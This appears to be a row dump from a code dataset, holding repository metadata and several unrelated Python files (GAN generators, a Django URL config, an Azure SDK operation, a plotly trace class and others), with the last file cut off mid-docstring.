hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794e12b7a8a7f3219aaa8282ecd50af508712999
| 1,392
|
py
|
Python
|
macrodensity/__init__.py
|
Zarand3r/MacroDensity
|
dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea
|
[
"MIT"
] | 57
|
2016-09-19T21:40:30.000Z
|
2022-02-24T03:39:51.000Z
|
macrodensity/__init__.py
|
Zarand3r/MacroDensity
|
dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea
|
[
"MIT"
] | 21
|
2017-05-25T03:15:31.000Z
|
2021-11-04T16:08:18.000Z
|
macrodensity/__init__.py
|
Zarand3r/MacroDensity
|
dc1afd60e2c3e8f6f81ef0cad85619bc1469c7ea
|
[
"MIT"
] | 29
|
2016-04-11T02:01:08.000Z
|
2022-01-24T21:22:06.000Z
|
###############################################################################
# Copyright Keith Butler(2014) #
# #
# This file MacroDensity.__init__.py is free software: you can #
# redistribute it and/or modify it under the terms of the GNU General Public #
# License as published by the Free Software Foundation, either version 3 of #
# the License, or (at your option) any later version. #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# You should have received a copy of the GNU General Public License along with#
# this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
import numpy
import numpy as np
import math
from scipy import interpolate
from macrodensity import vasp_tools
from macrodensity import plotting_tools
from macrodensity.density_tools import *
| 58
| 79
| 0.498563
|
794e13a475f041a82d733bbdc9e85698e4c514fa
| 15,454
|
py
|
Python
|
satflow/models/gan/generators.py
|
mfrasco/satflow
|
2e56b46dfd81a05670c6d2b1bda8c9eec38301a7
|
[
"MIT"
] | null | null | null |
satflow/models/gan/generators.py
|
mfrasco/satflow
|
2e56b46dfd81a05670c6d2b1bda8c9eec38301a7
|
[
"MIT"
] | null | null | null |
satflow/models/gan/generators.py
|
mfrasco/satflow
|
2e56b46dfd81a05670c6d2b1bda8c9eec38301a7
|
[
"MIT"
] | null | null | null |
import functools
import torch
from torch import nn as nn
from typing import Union
from satflow.models.gan.common import get_norm_layer, init_net
from satflow.models.utils import get_conv_layer
import antialiased_cnns
def define_generator(
input_nc,
output_nc,
ngf,
netG: Union[str, torch.nn.Module],
norm="batch",
use_dropout=False,
init_type="normal",
init_gain=0.02,
):
"""Create a generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128
norm (str) -- the name of normalization layers used in the network: batch | instance | none
use_dropout (bool) -- if use dropout layers.
init_type (str) -- the name of our initialization method.
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
Returns a generator
Our current implementation provides two types of generators:
U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)
The original U-Net paper: https://arxiv.org/abs/1505.04597
Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)
Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code from Justin Johnson's neural style transfer project (https://github.com/jcjohnson/fast-neural-style).
The generator has been initialized by <init_net>. It uses RELU for non-linearity.
"""
net = None
norm_layer = get_norm_layer(norm_type=norm)
if isinstance(netG, torch.nn.Module):
net = netG
elif netG == "resnet_9blocks":
net = ResnetGenerator(
input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9
)
elif netG == "resnet_6blocks":
net = ResnetGenerator(
input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=6
)
elif netG == "unet_128":
net = UnetGenerator(
input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout
)
elif netG == "unet_256":
net = UnetGenerator(
input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout
)
else:
raise NotImplementedError("Generator model name [%s] is not recognized" % netG)
return init_net(net, init_type, init_gain)
class ResnetGenerator(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)
"""
def __init__(
self,
input_nc,
output_nc,
ngf=64,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
n_blocks=6,
padding_type="reflect",
conv_type: str = "standard",
):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert n_blocks >= 0
super(ResnetGenerator, self).__init__()
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
conv2d = get_conv_layer(conv_type)
model = [
nn.ReflectionPad2d(3),
conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf),
nn.ReLU(True),
]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
if conv_type == "antialiased":
block = [
conv2d(
ngf * mult,
ngf * mult * 2,
kernel_size=3,
stride=1,
padding=1,
bias=use_bias,
),
norm_layer(ngf * mult * 2),
nn.ReLU(True),
antialiased_cnns.BlurPool(ngf * mult * 2, stride=2),
]
else:
block = [
conv2d(
ngf * mult,
ngf * mult * 2,
kernel_size=3,
stride=2,
padding=1,
bias=use_bias,
),
norm_layer(ngf * mult * 2),
nn.ReLU(True),
]
model += block
mult = 2 ** n_downsampling
for i in range(n_blocks): # add ResNet blocks
model += [
ResnetBlock(
ngf * mult,
padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout,
use_bias=use_bias,
)
]
for i in range(n_downsampling): # add upsampling layers
mult = 2 ** (n_downsampling - i)
model += [
nn.ConvTranspose2d(
ngf * mult,
int(ngf * mult / 2),
kernel_size=3,
stride=2,
padding=1,
output_padding=1,
bias=use_bias,
),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True),
]
model += [nn.ReflectionPad2d(3)]
model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input):
"""Standard forward"""
return self.model(input)
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(
self, dim, padding_type, norm_layer, use_dropout, use_bias, conv_type: str = "standard"
):
"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
conv2d = get_conv_layer(conv_type)
self.conv_block = self.build_conv_block(
dim, padding_type, norm_layer, use_dropout, use_bias, conv2d
)
def build_conv_block(
self, dim, padding_type, norm_layer, use_dropout, use_bias, conv2d: torch.nn.Module
):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == "zero":
p = 1
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block += [
conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True),
]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == "zero":
p = 1
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block += [
conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
class UnetGenerator(nn.Module):
"""Create a Unet-based generator"""
def __init__(
self,
input_nc,
output_nc,
num_downs,
ngf=64,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
conv_type: str = "standard",
):
"""Construct a Unet generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
num_downs (int) -- the number of downsamplings in UNet. For example, # if |num_downs| == 7,
image of size 128x128 will become of size 1x1 # at the bottleneck
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
We construct the U-Net from the innermost layer to the outermost layer.
It is a recursive process.
"""
super(UnetGenerator, self).__init__()
# construct unet structure
unet_block = UnetSkipConnectionBlock(
ngf * 8,
ngf * 8,
input_nc=None,
submodule=None,
norm_layer=norm_layer,
innermost=True,
conv_type=conv_type,
) # add the innermost layer
for i in range(num_downs - 5): # add intermediate layers with ngf * 8 filters
unet_block = UnetSkipConnectionBlock(
ngf * 8,
ngf * 8,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
use_dropout=use_dropout,
conv_type=conv_type,
)
# gradually reduce the number of filters from ngf * 8 to ngf
unet_block = UnetSkipConnectionBlock(
ngf * 4,
ngf * 8,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
unet_block = UnetSkipConnectionBlock(
ngf * 2,
ngf * 4,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
unet_block = UnetSkipConnectionBlock(
ngf,
ngf * 2,
input_nc=None,
submodule=unet_block,
norm_layer=norm_layer,
conv_type=conv_type,
)
self.model = UnetSkipConnectionBlock(
output_nc,
ngf,
input_nc=input_nc,
submodule=unet_block,
outermost=True,
norm_layer=norm_layer,
conv_type=conv_type,
) # add the outermost layer
def forward(self, input):
"""Standard forward"""
return self.model(input)
class UnetSkipConnectionBlock(nn.Module):
"""Defines the Unet submodule with skip connection.
X -------------------identity----------------------
|-- downsampling -- |submodule| -- upsampling --|
"""
def __init__(
self,
outer_nc,
inner_nc,
input_nc=None,
submodule=None,
outermost=False,
innermost=False,
norm_layer=nn.BatchNorm2d,
use_dropout=False,
conv_type: str = "standard",
):
"""Construct a Unet submodule with skip connections.
Parameters:
outer_nc (int) -- the number of filters in the outer conv layer
inner_nc (int) -- the number of filters in the inner conv layer
input_nc (int) -- the number of channels in input images/features
submodule (UnetSkipConnectionBlock) -- previously defined submodules
outermost (bool) -- if this module is the outermost module
innermost (bool) -- if this module is the innermost module
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
"""
super(UnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
if input_nc is None:
input_nc = outer_nc
conv2d = get_conv_layer(conv_type)
if conv_type == "antialiased":
antialiased = True
downconv = conv2d(input_nc, inner_nc, kernel_size=4, stride=1, padding=1, bias=use_bias)
blurpool = antialiased_cnns.BlurPool(inner_nc, stride=2)
else:
antialiased = False
downconv = conv2d(input_nc, inner_nc, kernel_size=4, stride=2, padding=1, bias=use_bias)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
elif innermost:
upconv = nn.ConvTranspose2d(
inner_nc, outer_nc, kernel_size=4, stride=2, padding=1, bias=use_bias
)
down = [downrelu, downconv, blurpool] if antialiased else [downrelu, downconv]
up = [uprelu, upconv, upnorm]
model = down + up
else:
upconv = nn.ConvTranspose2d(
inner_nc * 2, outer_nc, kernel_size=4, stride=2, padding=1, bias=use_bias
)
down = (
[downrelu, downconv, downnorm, blurpool]
if antialiased
else [downrelu, downconv, downnorm]
)
up = [uprelu, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost:
return self.model(x)
else: # add skip connections
return torch.cat([x, self.model(x)], 1)
| 35.939535
| 132
| 0.55662
|
794e14e160852403b6dfeb22aed50ef6d8b97635
| 532
|
py
|
Python
|
Taller Estructura Control Secuencial/Ejercicio_8.py
|
DiegoC386/Algoritmos_Diego
|
bb22b765ca15cb6ced5e3daae45cec300c421c18
|
[
"MIT"
] | null | null | null |
Taller Estructura Control Secuencial/Ejercicio_8.py
|
DiegoC386/Algoritmos_Diego
|
bb22b765ca15cb6ced5e3daae45cec300c421c18
|
[
"MIT"
] | null | null | null |
Taller Estructura Control Secuencial/Ejercicio_8.py
|
DiegoC386/Algoritmos_Diego
|
bb22b765ca15cb6ced5e3daae45cec300c421c18
|
[
"MIT"
] | null | null | null |
"""
Entradas
LongitudLado1-->float-->Lado1
LongitudLado2-->float-->Lado2
LongitudLado3-->float-->Lado3
Salidas
Semiperimetro-->float-->S
Area-->float-->A
"""
import math
#ENTRADA
Lado1=float(input("Ingrese la longitud del primer lado: "))
Lado2=float(input("Ingrese la longitud del segundo lado: "))
Lado3=float(input("Ingrese la longitud del tercer lado: "))
#CAJANEGRA
S=(Lado1+Lado2+Lado3)/2
A=math.sqrt(S*(S-Lado1)*(S-Lado2)*(S-Lado3))
print("El Semiperimetro es: "+str(S))
print("El Area del triangulo es: "+"{:.3f}".format(A))
| 28
| 60
| 0.714286
|
794e15eb8b5e789f522fcade043e284c5f706f1b
| 792
|
py
|
Python
|
core/urls.py
|
nixonsparrow/BookWorm
|
0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a
|
[
"Apache-2.0"
] | 1
|
2022-01-17T17:47:26.000Z
|
2022-01-17T17:47:26.000Z
|
core/urls.py
|
nixonsparrow/BookWorm
|
0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a
|
[
"Apache-2.0"
] | 1
|
2022-01-17T19:23:19.000Z
|
2022-01-17T19:23:19.000Z
|
core/urls.py
|
nixonsparrow/BookWorm
|
0248334e4b5a40e9faad5ec485e1a0abbdfe0c7a
|
[
"Apache-2.0"
] | null | null | null |
"""core URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('books.urls')),
]
| 34.434783
| 77
| 0.700758
|
794e163f3b2a7bd7df34b5370d68695cfedd93cd
| 1,560
|
py
|
Python
|
python/setup.py
|
yasushi-saito/wslink
|
25c7d3b2f6da25b100bc69efa4e06b1defe22ca1
|
[
"BSD-3-Clause"
] | null | null | null |
python/setup.py
|
yasushi-saito/wslink
|
25c7d3b2f6da25b100bc69efa4e06b1defe22ca1
|
[
"BSD-3-Clause"
] | null | null | null |
python/setup.py
|
yasushi-saito/wslink
|
25c7d3b2f6da25b100bc69efa4e06b1defe22ca1
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
# import shutil
import sys
# import itertools
from setuptools import setup, find_packages
# from setuptools.command.install import install
# from distutils.dir_util import copy_tree
readme = ""
with open("README.rst") as f:
readme = f.read()
setup(
name="wslinklc",
description="Python/JavaScript library for communicating over WebSocket, with workarounds to publish messages synchronously, by Luminary",
long_description=readme,
author="Kitware, Inc.",
author_email="kitware@kitware.com",
url="https://github.com/kitware/wslink",
license="BSD-3-Clause",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords="websocket javascript rpc pubsub",
packages=find_packages("src", exclude=("tests.*", "tests")),
package_dir={"": "src"},
install_requires=["aiohttp"],
)
| 31.2
| 142
| 0.64359
|
794e166be9c5ab201424284bbe3f990d7b13fd11
| 491
|
py
|
Python
|
data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/ship/crafted/booster/shared_fast_charge_fuel_cell_mk3.iff"
result.attribute_template_id = 8
result.stfName("space_crafting_n","fast_charge_fuel_cell_mk3")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 28.882353
| 94
| 0.749491
|
794e16ae16a01b502f2df02442672a0f17f125c9
| 5,651
|
py
|
Python
|
src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py
|
hpsan/azure-cli-extensions
|
be1589bb6dd23837796e088d28e65e873050171e
|
[
"MIT"
] | null | null | null |
src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py
|
hpsan/azure-cli-extensions
|
be1589bb6dd23837796e088d28e65e873050171e
|
[
"MIT"
] | null | null | null |
src/sentinel/azext_sentinel/vendored_sdks/security_insights/operations/comments_operations.py
|
hpsan/azure-cli-extensions
|
be1589bb6dd23837796e088d28e65e873050171e
|
[
"MIT"
] | 1
|
2020-07-16T23:49:49.000Z
|
2020-07-16T23:49:49.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class CommentsOperations(object):
"""CommentsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: API version for the operation. Constant value: "2019-01-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
self.api_version = "2019-01-01-preview"
def list_by_case(
self, resource_group_name, operational_insights_resource_provider, workspace_name, case_id, filter=None, orderby=None, top=None, skip_token=None, custom_headers=None, raw=False, **operation_config):
"""Gets all case comments.
:param resource_group_name: The name of the resource group within the
user's subscription. The name is case insensitive.
:type resource_group_name: str
:param operational_insights_resource_provider: The namespace of
workspaces resource provider- Microsoft.OperationalInsights.
:type operational_insights_resource_provider: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param case_id: Case ID
:type case_id: str
:param filter: Filters the results, based on a Boolean condition.
Optional.
:type filter: str
:param orderby: Sorts the results. Optional.
:type orderby: str
:param top: Returns only the first n results. Optional.
:type top: int
:param skip_token: Skiptoken is only used if a previous operation
returned a partial result. If a previous response contains a nextLink
element, the value of the nextLink element will include a skiptoken
parameter that specifies a starting point to use for subsequent calls.
Optional.
:type skip_token: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CaseCommentList or ClientRawResponse if raw=true
:rtype: ~securityinsights.models.CaseCommentList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CloudErrorException<securityinsights.models.CloudErrorException>`
"""
# Construct URL
url = self.list_by_case.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str', pattern=r'^[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}$'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationalInsightsResourceProvider': self._serialize.url("operational_insights_resource_provider", operational_insights_resource_provider, 'str'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=90, min_length=1),
'caseId': self._serialize.url("case_id", case_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CloudErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CaseCommentList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_by_case.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{operationalInsightsResourceProvider}/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/cases/{caseId}/comments'}
| 47.487395
| 241
| 0.668554
|
794e16b975142922d7dcc1b1c516bfe2b1090f7e
| 500
|
py
|
Python
|
RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | 3
|
2018-08-24T19:10:26.000Z
|
2019-02-19T11:45:32.000Z
|
RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | 3
|
2018-08-23T13:40:24.000Z
|
2019-12-05T21:16:03.000Z
|
RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByIsolationUsingLeadingPion_cfi.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | 5
|
2018-08-21T16:37:52.000Z
|
2020-01-09T13:33:17.000Z
|
import FWCore.ParameterSet.Config as cms
import copy
from RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation
from RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadPion
pfRecoTauDiscriminationByIsolationUsingLeadingPion = copy.deepcopy(pfRecoTauDiscriminationByIsolation)
# Require a lead pion (charged OR neutral) instead of strictly a leading track
pfRecoTauDiscriminationByIsolationUsingLeadingPion.Prediscriminants = requireLeadPion
| 41.666667
| 105
| 0.892
|
794e16eb28d32f4b7ab0992ea30b6080991ffc77
| 141
|
py
|
Python
|
lib/db.py
|
hygoni/CNUNotifier
|
964a7b080ab3ec1caa3769d4c5b164fbae5161ba
|
[
"MIT"
] | 4
|
2019-08-13T12:09:25.000Z
|
2021-05-29T15:33:55.000Z
|
lib/db.py
|
hygoni/CNUNotifier
|
964a7b080ab3ec1caa3769d4c5b164fbae5161ba
|
[
"MIT"
] | 1
|
2019-08-18T07:59:54.000Z
|
2019-08-19T12:20:45.000Z
|
lib/db.py
|
hygoni/CNUNotifier
|
964a7b080ab3ec1caa3769d4c5b164fbae5161ba
|
[
"MIT"
] | 1
|
2019-08-10T10:32:42.000Z
|
2019-08-10T10:32:42.000Z
|
import pymysql
def getConn():
conn = pymysql.connect(host='localhost', user='cnunoti', password='cnunoti', db='cnunoti')
return conn
| 23.5
| 92
| 0.702128
|
794e179f841bd8c4954241cef2dbc4f62f132d8e
| 6,166
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/lib/python3.8/site-packages/plotly/graph_objs/volume/slices/_y.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Y(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume.slices"
_path_str = "volume.slices.y"
_valid_props = {"fill", "locations", "locationssrc", "show"}
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the `slices`. The default fill value of
the `slices` is 1 meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than one would allow
the creation of openings parallel to the edges.
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["fill"]
@fill.setter
def fill(self, val):
self["fill"] = val
# locations
# ---------
@property
def locations(self):
"""
Specifies the location(s) of slices on the axis. When not
specified slices would be created for all points of the axis y
except start and end.
The 'locations' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["locations"]
@locations.setter
def locations(self, val):
self["locations"] = val
# locationssrc
# ------------
@property
def locationssrc(self):
"""
Sets the source reference on Chart Studio Cloud for locations
.
The 'locationssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["locationssrc"]
@locationssrc.setter
def locationssrc(self, val):
self["locationssrc"] = val
# show
# ----
@property
def show(self):
"""
Determines whether or not slice planes about the y dimension
are drawn.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["show"]
@show.setter
def show(self, val):
self["show"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis y except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
locations .
show
Determines whether or not slice planes about the y
dimension are drawn.
"""
def __init__(
self,
arg=None,
fill=None,
locations=None,
locationssrc=None,
show=None,
**kwargs
):
"""
Construct a new Y object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.volume.slices.Y`
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
